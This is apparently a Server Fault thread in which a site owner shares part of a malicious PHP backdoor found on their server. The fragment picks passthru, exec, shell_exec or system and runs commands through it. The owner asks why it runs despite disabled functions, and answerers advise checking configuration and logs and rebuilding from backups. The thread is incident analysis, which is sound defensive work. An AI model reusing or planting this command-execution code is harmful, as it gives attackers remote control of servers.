0

I had one problem on my server today and I discovered malicious code which is used to gain access to my system for attacker. I have downloaded that php script, but what was weird is that I saw functions which are disabled in my php configuration.

Disabled are: passthru,exec,shell_exec,system.... among others

How is that possible?

This is part of code

function get_execution_method()
{
 if(function_exists('passthru')){ $m = "passthru"; }
 if(function_exists('exec')){ $m = "exec"; }
 if(function_exists('shell_exec')){ $m = "shell_ exec"; }
 if(function_exists('system')){ $m = "system"; }
 if(!isset($m)) //No method found :-|
 {
  $m = "Disabled";
 }
 return($m);
}
function execute_command($method,$command)
{
 if($method == "passthru")
 {
  passthru($command);
 }

 elseif($method == "exec")
 {
  exec($command,$result);
  foreach($result as $output)
  {
   print $output."<br>";
  }
 }

 elseif($method == "shell_exec")
 {
  print shell_exec($command);
 }

 elseif($method == "system")
 {
  system($command);
 }
}
function perm($file)
{
 if(file_exists($file))
 {
  return substr(sprintf('%o', fileperms($file)), -4);
 }
 else
 {
  return "????";
 }
}

Just to be sure that there are no left overs, I have copied that script to new account which no one has access to except me. There is no htaccess file or php.ini. Script still works on that account. I have created phpinfo file to see php configuration for that file and here are disabled functions.

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen

As you can see, listed functions which are used in that script are inside disabled functions.

When I try to run some of disabled functions I get message

Warning: system() has been disabled for security reasons in /home/user....

Just to make sure, I have uploaded that script to different server and same was possible. That server also has same disabled functions.

How can I prevent this from allowing someone access to my files?

emir
  • 161
  • 3
  • 9
  • 2
    If your system has already been attacked this way, then you should simply restore from backups. Your PHP might have been replaced with a version that simply doesn't obey any of these settings, or many other things could have been changed. – Tero Kilkanen Mar 19 '17 at 07:23
  • system files are not because I am using CageFS which prevents any user to access any but self account or settings. – emir Mar 19 '17 at 19:09
  • You cannot be sure of that. Even though tools place different kinds of restrictions to user access on things, they might be buggy themselves and could be exploited. – Tero Kilkanen Mar 20 '17 at 01:39
  • I have just uploaded script it to different server with same disabled functions, and script bypasses them. This server is not related to one where script was found. – emir Mar 20 '17 at 07:29
  • Obligatory Reference: https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server. – Phill W. Jan 25 '22 at 12:43

1 Answers1

0

Probably you are looking in the wrong php.ini. Confirm that the functions are disabled by creating a test.php containing the following in the same folder the malicious code was and navigate to it. Check out disable_functions and confirm they are.

<?php

phpinfo();

?>

Most apache installations on linux support many ways of executing php code, check out disable_functions on all you system wide php.ini with this:

grep -rn disable_functions /etc/php*/

Also check out any php.ini and .htaccess in your /var/www.

Check out vhosts logs, apache logs, system logs.

Depending on the level of your system's compromise you may even be unable to see the actual configuration files in production for your services.

Edit: After reading your further comments I must suppose that your system is deeply compromised and you should (or, in your place, I would) quit wasting time and reinstall system / restore from backups. Please take seriously in account that many files on your sites are probably compromised too. Restore from backups don't take files from compromised system to new production env.

Marco
  • 1,679
  • 3
  • 17
  • 31
  • I have copied that php file to new account which noone has access to, and still the same. There is no any htaccess or php.ini file. Disabled functions as a result of phpinfo are pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen – emir Mar 19 '17 at 19:00
  • @emir how about the logs? Enable debug/verbose mode for both apache and php and take a look at what happens when the backdoor is invoked. Paste relevant lines please. – Marco Mar 19 '17 at 19:23
  • Do you mean to set apache LogLevel on debug? – emir Mar 19 '17 at 19:51
  • @emir not only, try this too: http://stackoverflow.com/a/3531852/3320401 – Marco Mar 19 '17 at 19:58
  • I have created php.ini file with content from https://perishablepress.com/advanced-php-error-handling-via-php/ which is referenced at link you provided. I am using this sctipt and there is no log – emir Mar 19 '17 at 20:08
  • @emir I edited my ansewer, not good news for you mate, I'm sorry. – Marco Mar 19 '17 at 20:12